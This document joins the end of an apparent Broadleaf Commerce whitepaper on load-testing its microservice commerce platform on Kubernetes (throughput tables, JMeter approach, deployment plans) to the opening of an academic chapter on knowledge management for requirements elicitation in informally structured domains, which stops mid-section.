Test Plan (100%) - Product API - Product Details API - Marketing Message API - Menu Footer API - Client Discovery API - Menu Header API - Cart API - Price Lists API - Add To Card API - Guest Token API - Contact Info API - Fulfillment Group API - Fulfillment Options API - Payments API - Checkout API Additional Considerations Impacting Multiple Factors - Menu Footer API - Client Discovery API - Menu Header API - Cart API - Price Lists API # Appendix B - Throughput Reference <table> <thead> <tr> <th>Type</th> <th>Label</th> <th>TPS</th> <th>OPS</th> <th>Node Specs</th> <th>Theme</th> </tr> </thead> <tbody> <tr> <td>(M)in</td> <td>S1</td> <td>20</td> <td>0.01</td> <td>1 - 4Core</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>S3</td> <td>277</td> <td>0.20</td> <td>3 - 4Core, 2 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>S4</td> <td>458</td> <td>0.36</td> <td>4 - 4Core, 2 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>S5</td> <td>640</td> <td>0.60</td> <td>5 - 4Core, 2 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>M3</td> <td>1057</td> <td>0.81</td> <td>3 - 8Core, 4 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>M5</td> <td>2000</td> <td>1.40</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(G)ranular</td> <td>L3</td> <td>1900</td> <td>1.50</td> <td>3 - 16Core, 4 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>L3</td> <td>2121</td> <td>1.65</td> <td>3 - 16Core, 4 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>L5</td> <td>3400</td> <td>2.50</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(G)ranular</td> <td>L5</td> <td>3400</td> <td>2.50</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Heavy, 3% Conversion</td> </tr> <tr> <td>(B)alanced</td> 
<td>S5</td> <td>289</td> <td>0.99</td> <td>5 - 4Core, 2 Core DB</td> <td>Browse Heavy, 14% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>M5</td> <td>1092</td> <td>3.35</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Heavy, 14% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>L5</td> <td>2389</td> <td>7.73</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Heavy, 14% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>M5</td> <td>791</td> <td>4.16</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Heavy, 25% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>L5</td> <td>1864</td> <td>9.21</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Heavy, 25% Conversion</td> </tr> <tr> <td>(B)alanced</td> <td>S5</td> <td>550</td> <td>0.60</td> <td>5 - 4Core, 2 Core DB</td> <td>Browse Heavy, 3% Conversion, Discounts</td> </tr> <tr> <td>(B)alanced</td> <td>M5</td> <td>1700</td> <td>1.20</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Heavy, 3% Conversion, Discounts</td> </tr> </tbody> </table> ## Appendix B - Throughput Reference <table> <thead> <tr> <th>Type</th> <th>Label</th> <th>TPS</th> <th>OPS</th> <th>Node Specs</th> <th>Theme</th> </tr> </thead> <tbody> <tr> <td>(B)aligned</td> <td>L5</td> <td>3000</td> <td>2.40</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Heavy, 3% Conversion, Discounts</td> </tr> <tr> <td>(B)aligned</td> <td>S5</td> <td>640</td> <td>0.60</td> <td>5 - 4Core, 2 Core DB</td> <td>Browse Heavy, 3% Conversion, Product Options</td> </tr> <tr> <td>(B)aligned</td> <td>M5</td> <td>1900</td> <td>1.40</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Heavy, 3% Conversion, Product Options</td> </tr> <tr> <td>(B)aligned</td> <td>L5</td> <td>3300</td> <td>2.40</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Heavy, 3% Conversion, Product Options</td> </tr> <tr> <td>(B)aligned</td> <td>M5</td> <td>498</td> <td>4.33</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Heavy, 50% Conversion</td> </tr> <tr> <td>(B)aligned</td> <td>L5</td> <td>1594</td> <td>13.83</td> <td>5 - 16Core, 8 Core 
DB</td> <td>Browse Heavy, 50% Conversion</td> </tr>
<tr> <td>(B)alanced</td> <td>M5</td> <td>420</td> <td>19.00</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Light, Small Cart, 100% Conversion</td> </tr>
<tr> <td>(B)alanced</td> <td>L5</td> <td>1040</td> <td>48.00</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Light, Small Cart, 100% Conversion</td> </tr>
<tr> <td>(B)alanced</td> <td>L6-M8-S4</td> <td>2100</td> <td>99.00</td> <td>6 - 16Core, 8 - 8Core, 4 - 4Core, 16 Core DB</td> <td>Browse Light, Small Cart, 100% Conversion</td> </tr>
<tr> <td>(B)alanced</td> <td>M5</td> <td>420</td> <td>19.00</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Light, Small Cart, 100% Conversion, Large Catalog</td> </tr>
<tr> <td>(B)alanced</td> <td>L5</td> <td>1020</td> <td>46.00</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Light, Small Cart, 100% Conversion, Large Catalog</td> </tr>
<tr> <td>(B)alanced</td> <td>M5</td> <td>420</td> <td>19.00</td> <td>5 - 8Core, 4 Core DB</td> <td>Browse Light, Small Cart, 100% Conversion, XL Catalog</td> </tr>
<tr> <td>(B)alanced</td> <td>L5</td> <td>980</td> <td>45.00</td> <td>5 - 16Core, 8 Core DB</td> <td>Browse Light, Small Cart, 100% Conversion, XL Catalog</td> </tr>
</tbody>
</table>

Appendix C - Approach

We use a custom JMeter rigging exposed via a web interface delivered by a Spring Boot application. The rigging is deployed in a dedicated test node pool that is maintained separately from the main application node pool. In some circumstances, multiple node pools were used for the application pods. This latter case occurred when it was advantageous to segregate pods by type (e.g. a node pool dedicated to replicas of the Browse type). The primary vehicle for attaining this level of separation was node tainting and toleration configuration, which forces scheduling segregation. To minimize cost, Terraform was configured to provision preemptible nodes.
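The taint/toleration pairing described above can be sketched as a simplified scheduling predicate. The pool name `pool=browse` and the dictionaries below are illustrative, not the actual cluster configuration, and the check deliberately ignores Kubernetes details such as the `Exists` operator and the `PreferNoSchedule`/`NoExecute` effects:

```python
# Illustrative sketch (not Broadleaf's actual configuration): a simplified
# version of the Kubernetes NoSchedule taint/toleration check used to
# segregate pods by node pool.

def tolerates(taint: dict, tolerations: list) -> bool:
    """Return True if any toleration matches the given taint exactly."""
    return any(
        t.get("key") == taint["key"]
        and t.get("value") == taint["value"]
        and t.get("effect") == taint["effect"]
        for t in tolerations
    )

def schedulable(node_taints: list, pod_tolerations: list) -> bool:
    """A pod may land on a node only if it tolerates every NoSchedule taint."""
    return all(tolerates(taint, pod_tolerations) for taint in node_taints)

# Hypothetical pool dedicated to Browse replicas, mirroring the YAML fields.
browse_pool_taints = [{"key": "pool", "value": "browse", "effect": "NoSchedule"}]
browse_pod = [{"key": "pool", "operator": "Equal", "value": "browse", "effect": "NoSchedule"}]
cart_pod = []  # no toleration: kept off the browse pool by the taint

print(schedulable(browse_pool_taints, browse_pod))  # True
print(schedulable(browse_pool_taints, cart_pod))    # False
```

In the real cluster this pairing would live in the Terraform node pool definition (taints) and each Helm chart's pod spec (`tolerations`), usually combined with node affinity so tolerant pods also prefer their own pool.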
Helm Charts were used to deploy the application and support components to the Kubernetes cluster. Shell scripts were used to interact with Terraform and Helm to automate the construction, installation, uninstallation, and destruction of the cluster. The overall goal was to minimize cluster uptime to reduce expense.

Monitoring system health at all levels was important during test runs. Distributed systems are complex, with many moving parts, each contributing to system health and performance. We leveraged separate Grafana dashboards for JMeter results (Figure 1) and system health (Figure 2). Visualizations in both dashboards can reveal system stress and are useful for determining where to scale resources and/or capacity. The system health dashboard is the same standard dashboard that ships with the framework.

Figure 1 - JMeter Dashboard

Total Requests | Failed Requests | Received Bytes | Sent Bytes | Error Rate %
--- | --- | --- | --- | ---
366304 Requests | 0 Failed | 1 GiB | 621 MiB | 0%

Summary Response Times (90th pct)
- Product Summary: 278.68 ms
- Checkout Summary: 230.90 ms
- Shipping Information Summary: 160.70 ms

API Response Times (90th pct)
- Checkout API: 354.70 ms
- Simple Add To Cart API: 140.48 ms
- Guest Token API: 107.90 ms
- Fulfillment Group API: 106.00 ms
- Contact Info API: 105.80 ms
- Payments API: 83.60 ms
- Product Details API: 81.00 ms

Figure 2 - System Health Dashboard

Cluster - Broadleaf CPU - Node 1: 77.1% - Node 2: 63.8% - Node 3: 58.0% - Node 4: 24.9% - Node 5: 23.0% - Node 6: 12.0% Application | Demo Browse | Instance 10.76.1.15:10000 Pod - Broadleaf CPU Usage - System Current: 60.54% - Process Current: 24.87% GC Pause Durations - Avg end of minor GC (GC0) Evacuation Pause: 150 ms - Avg end of minor GC (GC0) Humongous Allo: 100 ms - Avg end of minor GC (Metadata GC Thresh): 50 ms - Max end of minor GC (GC0) Evacuation Pause: 100 ms Threads - Live Max: 270, Current: 270 - New Max: 50,
Current: 0 - Runnable Max: 65, Current: 65 - Terminated Max: 0, Current: 0 Thread States - Blocked Max: 0, Current: 0 - New Max: 0, Current: 0 - Runnable Max: 65, Current: 65 - Terminated Max: 0, Current: 0 JVM Heap - Current: 290 MB - Committed: 518 MB - Max: 1.46 GB JVM Non-Heap - Current: 345 MB - Committed: 354 MB - Max: 1.19 GB Additional time-series panels chart request rate, request duration, errors, connection pool size, total acquire time and total usage time (axis tick values omitted).

Appendix D - Components

Core Components
• Microservices - Provides the core application functionality
• Auth - Provides OAuth related security functionality
• Gateway - Proxy exposed to the client and routes traffic to a microservice
• Database - Data persistence layer for the application
• Kafka - Messaging broker for the application
• Solr - Search services for the application
• Zookeeper - Distributed synchronization for Solr and Kafka
• EFK Stack - APM and centralized log management
• Prometheus - Time series database for system health metrics
• Grafana - System health telemetry

Testing Components
• JMeter - Distributed load test client
• InfluxDB - Time series database for load test results - See Figure 3 for deployment diagram

Granular Microservices: Asset, Catalog, Campaign, Offer, Pricing, Vendor, Catalog Browse, Menu, Personalization, Inventory, Cart, Order, Customer, Cart Operations, Order Operations, Import, Scheduled Job, Admin Navigation, Admin User, Sandbox, Metadata, Tenant, Notification, Search, Indexer

## Balanced FlexPackage™ Contents

<table>
<thead>
<tr> <th>Type</th> <th>Contents</th> </tr>
</thead>
<tbody>
<tr> <td>Browse</td> <td>Asset, Catalog, Campaign, Offer, Pricing, Vendor, Catalog Browse, Menu, Personalization</td> </tr>
<tr> <td>Cart</td> <td>Inventory, Cart, Order, Customer, Cart
Operations, Order Operations</td> </tr>
<tr> <td>Processing</td> <td>Import, Inventory, Scheduled Job, Catalog, Campaign, Offer, Pricing, Customer, Order, Menu, Personalization, Indexer</td> </tr>
<tr> <td>Supporting</td> <td>Admin Navigation, Admin User, Sandbox, Metadata, Tenant, Notification, Search</td> </tr>
</tbody>
</table>

## Min FlexPackage™ Contents

<table>
<thead>
<tr> <th>Type</th> <th>Contents</th> </tr>
</thead>
<tbody>
<tr> <td>Min</td> <td>Asset, Catalog, Campaign, Offer, Pricing, Vendor, Catalog Browse, Menu, Personalization, Inventory, Cart, Order, Customer, Cart Operations, Order Operations, Import, Scheduled Job, Admin Navigation, Admin User, Sandbox, Metadata, Tenant, Notification, Search</td> </tr>
</tbody>
</table>

*There is some redundancy in microservices located in Processing. Processing handles longer lifecycle tasks from the admin and scheduled jobs. That work is isolated here, protecting the utilization of Browse and Cart for customer-facing traffic.

Figure 3 - Sample Deployment Diagram (Observability components not depicted)

**Appendix E - Sample Kubernetes Deployment Plans**

**BM5 at Browse Heavy 3% Conversion Test** (Other components not shown)

<table>
<thead>
<tr> <th>Type</th> <th>Replicas</th> <th>Cores Requested (m)</th> <th>Memory Requested (Mi)</th> </tr>
</thead>
<tbody>
<tr> <td>Auth</td> <td>2</td> <td>800</td> <td>1000</td> </tr>
<tr> <td>Browse</td> <td>3</td> <td>2000</td> <td>2000</td> </tr>
<tr> <td>Cart</td> <td>2</td> <td>2000</td> <td>2000</td> </tr>
<tr> <td>Processing</td> <td>3</td> <td>700</td> <td>2000</td> </tr>
<tr> <td>Supporting</td> <td>3</td> <td>700</td> <td>2000</td> </tr>
<tr> <td>Gateway</td> <td>5</td> <td>1200</td> <td>500</td> </tr>
</tbody>
</table>

**BL5 at Browse Heavy 3% Conversion Test** (Other components not shown)

<table>
<thead>
<tr> <th>Type</th> <th>Replicas</th> <th>Cores Requested (m)</th> <th>Memory Requested (Mi)</th> </tr>
</thead>
<tbody>
<tr> <td>Auth</td>
<td>5</td> <td>1600</td> <td>1000</td> </tr>
<tr> <td>Browse</td> <td>10</td> <td>2200</td> <td>2000</td> </tr>
<tr> <td>Cart</td> <td>10</td> <td>1600</td> <td>2000</td> </tr>
<tr> <td>Processing</td> <td>5</td> <td>1300</td> <td>2000</td> </tr>
<tr> <td>Supporting</td> <td>5</td> <td>1300</td> <td>2000</td> </tr>
<tr> <td>Gateway</td> <td>10</td> <td>1000</td> <td>500</td> </tr>
</tbody>
</table>

**BL6-M8-S4 at Order Focused 100% Conversion Test** (Other components not shown)

<table>
<thead>
<tr> <th>Type</th> <th>Replicas</th> <th>Cores Requested (m)</th> <th>Memory Requested (Mi)</th> </tr>
</thead>
<tbody>
<tr> <td>Auth</td> <td>10</td> <td>1400</td> <td>1000</td> </tr>
<tr> <td>Browse</td> <td>14</td> <td>2000</td> <td>2000</td> </tr>
<tr> <td>Cart</td> <td>20</td> <td>3000</td> <td>2000</td> </tr>
<tr> <td>Processing</td> <td>10</td> <td>1400</td> <td>2000</td> </tr>
<tr> <td>Supporting</td> <td>10</td> <td>1400</td> <td>2000</td> </tr>
<tr> <td>Gateway</td> <td>14</td> <td>1000</td> <td>500</td> </tr>
</tbody>
</table>

Appendix F - Technical Recommendations

It is worth noting that the Kubernetes scheduler on its own does a fair job of organizing pods based on the defined resource requests. However, you will often require more control over how pods are scheduled. Kubernetes provides several advanced configuration mechanisms that should be included in your toolbelt when designing a deployment for your cluster. Specifically, node tainting, toleration, and affinity configurations are invaluable for customizing the deployment to achieve the most efficient and performant installation. We made extensive use of these features during the testing performed for this paper. If your scale requirements are large enough, it will begin to make sense to segregate pods by type into different node pools. This type of configuration is most clearly evidenced in our BL6-M8-S4 configuration, which was used to achieve 100 OPS.
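As a rough sanity check, a deployment plan like the BL5 table above can be totaled against the capacity of its node pool (five 16-core application nodes, per Appendix B). The replica and millicore figures below come from the BL5 table; the fit arithmetic itself is our own illustration, not part of the original test harness:

```python
# Sum the requested cores for the BL5 plan (Appendix E) and compare against
# the 5-node, 16-core application pool it ran on. Figures are from the
# tables above; the headroom calculation is illustrative.

bl5_plan = {
    # type: (replicas, millicores requested per replica)
    "Auth":       (5, 1600),
    "Browse":     (10, 2200),
    "Cart":       (10, 1600),
    "Processing": (5, 1300),
    "Supporting": (5, 1300),
    "Gateway":    (10, 1000),
}

requested_m = sum(replicas * cores for replicas, cores in bl5_plan.values())
capacity_m = 5 * 16 * 1000  # 5 nodes x 16 cores, in millicores

print(f"requested: {requested_m} m")    # 69000 m
print(f"capacity:  {capacity_m} m")     # 80000 m
print(f"headroom:  {capacity_m - requested_m} m")  # left for system pods and bursts
```

The roughly 11 cores of headroom in this sketch is consistent with leaving room for kube-system daemons and short CPU bursts above the requests.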
The performance of the system will be most sensitive to adjustments in CPU core request configuration. The system performs well at smaller sizes for smaller throughput requirements. However, the most efficient sizing when using the balanced FlexPackage™ utilizes cart pod replicas sized at 3000m and browse pod replicas sized at 2000m. Consider these sizes as you explore larger nodes, where you have more opportunity to request larger CPU allocations. When starting a load test, it can be advantageous to use a liberal node size and not define pod resource constraints. Then, run load and review kubectl top pod results to see where resources are naturally allocated. Armed with that information as a guideline, set up pod resource requests and limits for future test runs. Add replicas until you reach your throughput goals. Such an approach takes some of the guesswork out of designing a load test.

Built with the future in mind, Broadleaf Commerce is an enterprise software provider with a proven track record of solving complex commerce challenges. Our API-first approach and cloud-native microservice architecture give you the control, flexibility, and performance to innovate quicker and achieve time to value faster. As the market-leading choice for enterprise organizations requiring tailored, highly scalable commerce systems, we deliver a modular platform that embraces an open philosophy with an extensible and intuitive administrative console. Broadleaf Commerce was founded in 2009. Over the years, we have earned the trust of leading brands like O'Reilly Auto Parts, Major League Baseball, ICON Fitness, and Telefonica. broadleafcommerce.com
Published by IntechOpen, the world's leading publisher of Open Access books (www.intechopen.com).

Knowledge Management for Informally Structured Domains: Challenges and Proposals

Karla Olmos-Sánchez and Jorge Rodas-Osollo

Abstract

Eliciting requirements for products or solutions in informally structured domains is a highly creative and complex activity due to the inherent characteristics of these domains, such as the great quantities of tacit knowledge used by domain specialists, the dynamic interaction between domain specialists and their environment in order to solve problems, the necessity for these solutions or products to be developed by teams of specialists and the asymmetry of knowledge between domain specialists and requirements engineers. The knowledge management discipline promotes an integrated approach to facing these challenges; therefore, a strategy for requirements elicitation that incorporates techniques and methods from this discipline has been proposed as a serious approach to dealing with them. The valuable results of applying the strategy in real cases provide empirical insights about its utility.

Keywords: knowledge management, informally structured domains, requirements elicitation, tacit knowledge, knowledge creation spiral

1. Introduction

Requirements elicitation (RE) is a valuable process for the identification of solution requirements according to the needs of clients or users [1].
In this chapter, the concept of solutions includes products, such as software systems, and intangible solutions, such as data analysis. According to several authors, application domain knowledge is essential to obtain correct and appropriate requirements. The application domain is the area where a solution is or will be used. Consequently, requirements engineers must understand, as soon as possible, the structure, processes and restrictions of a domain in which they are generally neophytes. This knowledge belongs to domain specialists: any person possessing application domain knowledge and/or having a role in the domain. Therefore, requirements engineers must elicit the application domain knowledge from domain specialists in order to include it in a set of solution requirements. It is a complex and highly creative activity that involves intensive cognitive work, especially when the application domain has a high degree of informality, where knowledge is informally stated, partially complete, implicitly assumed, tacit and unstructured [2]. This phenomenon appears in many disciplines, such as intelligent tailored solutions for ill-structured domains, software for complex domains, intelligent tutoring systems, knowledge-based systems and industrial design, among others. In general, any need that requires a complex, highly creative solution, in which the requirements engineers are not part of the application domain and must elicit sufficient high-quality knowledge to understand the clients' needs and expectations, faces this challenge [2]. Therefore, instead of focusing on the challenges of developing a requirements elicitation proposal for each of these complex areas, we have expanded the vision and generalized these domains as informally structured domains (ISD) [3], which are widely explained in Section 2. In addition, solutions in ISD usually respond to clients' and users' specific needs.
As a result, they are diverse, consensus-based and unverifiable, and there are no fully defined processes to develop them. Therefore, these solutions or products must be developed according to the experience of domain specialists. These characteristics hamper the requirements elicitation process because the implications of knowledge transfer and transformation, the appropriate management of tacit knowledge and the issues of knowledge exchange must all be considered. In this context, we assume that a perspective on requirements elicitation that emphasizes the importance of knowledge management (KM) is a useful approach for addressing the inherent problems of ISD. KM is a discipline with the aim of enhancing an organization by sharing and managing knowledge flow among people, taking advantage of information technologies [4]. Considering KM in requirements elicitation is not new, but only a few efforts offer a full knowledge management perspective [5]. The knowledge management strategy for requirements engineering (KMoS-RE©) [6] is a high-level plan oriented to the transfer and transformation of knowledge. The strategy has the aim of eliciting, structuring and creating knowledge that can be incorporated into a specification close to the needs and expectations of clients. It is specially designed from a full KM perspective in order to be applied in the context of ISD. The goal of this chapter is to describe the challenges of ISD and to make a critical analysis of the KMoS-RE© strategy as a serious requirements elicitation proposal for facing them. The analysis is based on the experience of applying the strategy in several real ISD cases. According to the valuable results, the KMoS-RE© strategy promises to be a useful tool in the requirements elicitation of solutions or products, especially in disciplines that share ISD characteristics [8].
The remainder of this chapter is organized as follows: Section 2 presents a characterization of ISD in order to explain the challenges of eliciting requirements in these domains; this section also includes a wide explanation of tacit knowledge. Section 3 describes fundamental concepts of KM in requirements elicitation. Section 4 discusses the use of KMoS-RE© as a serious proposal to face the challenges of ISD. Finally, in Section 5, the conclusions and future work are presented.

2. Informally structured domains

2.1. Tacit knowledge

As discussed above, a key element in a successful requirements elicitation process in ISD is knowledge. But what is knowledge? Despite the widely recognised importance of knowledge as the main asset of today's society, defining it is an unresolved issue. In order to establish a baseline, this work supports the idea that knowledge has a subjective and personal quality. This view is based on the traditional definition of knowledge as justified true belief. However, as in Ref. [9], the focus is on the justified rather than the true aspect of belief. The justified view treats knowledge as dynamic, context-specific, humanistic, deeply rooted in individuals' value systems and created in social interactions among individuals, as opposed to the true view, in which knowledge is absolute, static and non-human. According to Ryle, knowledge can be classified into knowing-that and knowing-how. Knowing-that means storing and recalling facts. Knowing-how is practical knowledge. This distinction carries through to Polanyi's theory of personal knowledge, which classifies knowledge into explicit and tacit [10]. Explicit knowledge is transmitted through any language or formal representation: from text written in natural language to formalisms as complex as ontologies. On the other hand, tacit knowledge is personal and context-specific, generated by experience and therefore difficult to communicate and formalize.
Polanyi was interested in '… to show that complete objectivity, as usually attributed to the exact science, is a delusion and is in fact a false idea'. Thus, he examined how individuals gain and share knowledge. He concluded that knowledge is highly personal and questioned the commonly held view of the dispassionate objective scientist. He also emphasized that people can often know how to do things without either consciously knowing or being able to articulate to others why what they do works. According to Polanyi, tacitness is something personal, usually abilities or skills that people use to solve a problem or to do something valuable. Tacitness depends on people's experiences and learning. Polanyi suggested that all knowledge has a tacit component and discussed the process by which the tacit cooperates with the explicit. He also argued that language is a vital tool that people use to share knowledge, and that with the appropriate use of it, much, but not all, of this knowledge can be transmitted among individuals who share a mutually agreed language. When tacitness predominates, this articulation is not possible. However, it does not prevent knowledge from being transmitted by other means, such as observation or task repetition. This is what people do when learning to ride a bicycle or when an art master transfers knowledge to his or her apprentices. We should keep in mind that Polanyi's theory was generated in the field of psychology and his work was addressed towards perception. Thus, from Polanyi's perspective, any attempt to convert tacit knowledge to explicit knowledge will be unfruitful because it cannot be articulated at all. Grant [11] provides a graphical representation of the granularity of knowledge as expressed in Polanyi's work (Figure 1). The bar represents how knowledge flows in a continuum between tacit and explicit. The continuum ranges from knowledge inherently tacit to knowledge that can be easily expressed by words.
The knowledge that can be expressed by words ranges from knowledge explicit only to experts to knowledge explicit to most people. The knowledge explicit to experts requires specialized language. Most of this knowledge is also implicit, i.e. knowledge that can be expressed in words but that, for some reason, has not been made explicit. Tacit knowledge ranges from ineffable to highly personal. Much of this knowledge is related to the use of instruments, such as playing the piano or using a specialized machine.

Figure 1. Granularity of knowledge.

To Gourlay [12], Polanyi's work has been misunderstood. He argued that some tacit knowledge does become amenable to analysis and decomposition, allowing it to be recorded in an explicit form. Likewise, tacit knowledge in requirements elicitation has been misused. For example, Janik [12] identified that the concept of tacit knowledge is used in two ways:

1. Concerning knowledge that can be expressed but, for some reason, remains hidden. Janik identified three reasons why knowledge tends to remain tacit: (1) concern for secrecy and power, (2) because no one has bothered to recognize it or tried to explain it and (3) because it concerns presuppositions we all generally hold. These situations can be conscious, as in the first case, or unconscious, as in the second and third. However, there are no insuperable barriers to making this knowledge explicit.

2. Concerning knowledge gained through familiarity and practice, which is inexpressible in words, or knowledge gained through perception such as sight, smell or know-how. A wine taster's palate, or identifying an instrument when listening to a sound, are examples of this knowledge.

What is really important in requirements elicitation is making the greatest possible quantity of knowledge explicit, whether it is tacit, implicit or knowledge that remains hidden for some reason, even because nobody asks. The problem of tacit knowledge in requirements elicitation is not new.
Goguen [13] did an extensive analysis of the term from a social perspective. He analysed several methods used to elicit requirements, such as introspection, questionnaires, interviews, focus groups and even protocol analysis. He argued that these methods have limitations in managing tacit knowledge. To Goguen, it is indispensable to consider a social perspective to attend to this problem; thus, he suggests using combinations of these methods in addition to discourse, conversation and interaction analysis. Later, Nuseibeh [14] emphasized the importance of tacit knowledge and how it may affect the requirements elicitation process. For him, the responses of domain specialists to direct questions about their domain of expertise reflect neither their current behaviour nor reality, owing to the large amounts of tacit knowledge they handle. Thus, product developers or solution solvers should consider theoretical and practical techniques from cognitive psychology, anthropology, sociology and linguistics to obtain better results. The importance of sharing tacit knowledge to improve problem-solving processes, or as a strategy to gain competitive advantage in organizations, is undeniable. For example, Wyatt [15] argues that much of the medical progress in modern times has been attributed to an evolution from tacit to explicit knowledge. Despite that, tacit knowledge nowadays remains an ambiguous and inconsistent concept. We are aware that not all knowledge of specialists is susceptible to becoming explicit; however, it is essential to attempt this transformation with a well-founded strategy in order to obtain requirements as close as possible to the reality of the application domain.

2.2. Formality and informality

Intuitively, a domain is a well-defined area of human activity, with formal and informal issues, in which a universe of discourse occurs. According to Webster's Dictionary, 'formal' means definite, orderly and methodical.
In computer science, being formal does not necessarily require the use of formal logic, or even mathematics, but the use of a formal notation to represent system models. Everything that computers do is formal because the syntactic structures in a program are manipulated according to well-defined rules [13]. In domains with a significant social context, much of the information is embedded in the social world of domain specialists; it is informal (not susceptible to being formalized, or not yet formalized) and depends on the context for its interpretation [16]. These kinds of domains share characteristics such as informally defined concepts and a lack of absolute verification of processes; therefore, the domain specialists must use a great quantity of tacit knowledge to solve everyday situations. Every domain is susceptible to being formalized to a certain level, but there will always be issues that remain informal. If a domain is mainly formal, the domain specialists can build formal structures to solve problems in a relatively easy way. On the other hand, if a domain is mainly informal, it does not mean that domain specialists cannot build a structure; they certainly do. In some way, it is possible to solve diagnostic or design problems; however, these structures are informal, i.e. they depend on the context and on the domain specialists' experience and knowledge. When informal characteristics prevail, the process and effort needed to solve problems can be extremely costly and time consuming. Nguyen and Shanks [17] describe requirements elicitation as an ill-structured problem due to its openness, its poorly understood context and the existence of multiple domains. For Nguyen, solving problems in requirements elicitation requires complex and dynamic social interaction between domain specialists and developers.
The knowledge of both actors evolves as the project advances: the domain specialists get involved with the software solution and the developers with the organizational structure and business processes, i.e. the application domain. According to Nguyen, in order to solve ill-structured problems, understanding the problem and structuring the solution are interleaved. The problem solvers, i.e. the requirements engineers, must explore different areas of the problem to find a solution. To accomplish this task, they communicate with the diverse actors who hold domain knowledge or another perspective on the possible solution. By performing this task, their domain knowledge increases and they can return to previous stages of the problem, but with additional knowledge that allows them to explore new possibilities of solution. Therefore, the knowledge of the problem and its solution gradually evolves as the requirements engineers gain more knowledge of the domain, mainly through social interactions and involvement with the business processes. We go further and assume that the degree of informality of the application domain influences the complexity of the process, as Figure 2 depicts. Our focus is on the requirements elicitation process for domains with a high degree of informality, where knowledge is informally stated, partially complete, implicitly assumed, tacit and unstructured.

### 2.3. Characteristics of ISD

In order to deal effectively with ISD, we assume that they are located at the intersection of knowledge engineering and requirements engineering, and that they have the following characteristics [2]:

- Presence of multiple domain specialists who have different backgrounds, perspectives, interests and expectations, and whose knowledge of the application domain, either tacit or explicit, varies depending on their experience and their role in the domain. Usually, domain specialists are not aware of the details of the product or solution and only have a vague idea of its general functionality.
• Presence of a group of requirements engineers, responsible for eliciting the requirements, who generally are not involved in the application domain. They have general technical knowledge about the development of the product or solution; however, they must elicit the application domain knowledge in order to understand its details and derive the correct and appropriate solution requirements.

• The solution solves or addresses a particular and unrepeatable situation; thus, it must have its own design. However, there could be an infinite number of alternative solutions. In addition, the solution could be a tangible or intangible product, and it must be developed according to a requirements specification.

• A requirements specification is a document that contains the set of solution requirements. A requirement is a natural language statement to be enforced by the solution, possibly in cooperation with other system components, and formulated in terms of the application domain. Developing the requirements specification requires eliciting, synthesizing, validating, sharing and creating great quantities of application domain knowledge and solution knowledge in order to reach an acceptable solution. In addition, developing the requirements specification calls for dialectical thinking among all involved in the project.

Figure 3 depicts the characteristics described above; the figure represents explicit knowledge by puzzle pieces and tacit knowledge by clouds. The requirements specification is formed by pieces of knowledge of the domain specialists and requirements engineers. The requirements engineers must make the greatest possible amount of tacit knowledge explicit, synthesize the disperse knowledge and reconcile the diverse beliefs and necessities of the domain specialists. In addition, they need to incorporate their own technical knowledge in order to generate the set of requirements of the solution.

Figure 3. Informally structured domains.
In the figure, this process is represented by the solved puzzle. The cloud in the solved puzzle means that there will always be knowledge that is not susceptible to formalization.

### 2.4. Challenges in ISD

Some challenges of ISD are described as follows:

#### 2.4.1. Tacit knowledge

Tacit knowledge can cause critical knowledge, goals, expectations or assumptions to remain hidden. In consequence, the emerging requirements will be incomplete and inappropriate, which can lead to poor systems or costly effects [18].

#### 2.4.2. Situatedness

Situated actions involve a dynamic interaction between the actor and its environment; they only acquire meaning through interpretation in a specific context [19]. Situated actions involve conscious reference to the context and a choice of action. An action is not situated if it takes the form of a prescribed response or an unconscious automatic response. In ISD, situated actions occur frequently; in consequence, requirements are mostly situated and depend on a process of negotiation. In this situation, domain knowledge is fundamental in order to understand the rationality behind requirements, facilitate the negotiation process and propose technological aspects of the solution according to the real necessities of the domain specialists.

#### 2.4.3. Disperse knowledge

Products or solutions in ISD are so complex that the human knowledge required to develop them is generally vastly larger than any individual human capacity [20]. Therefore, organized teams of specialists must develop them. In order to cooperate in the solution, domain specialists must share some knowledge about the domain. However, they always have different backgrounds, perspectives, interests and expectations, and their knowledge and experience vary depending on their own practice and role in the domain. Sometimes even inconsistent and incompatible beliefs can exist.
Product developers or solution solvers should reconcile and prioritize the diverse beliefs and knowledge about the application domain in order to incorporate them into the solution.

#### 2.4.4. Asymmetry of knowledge

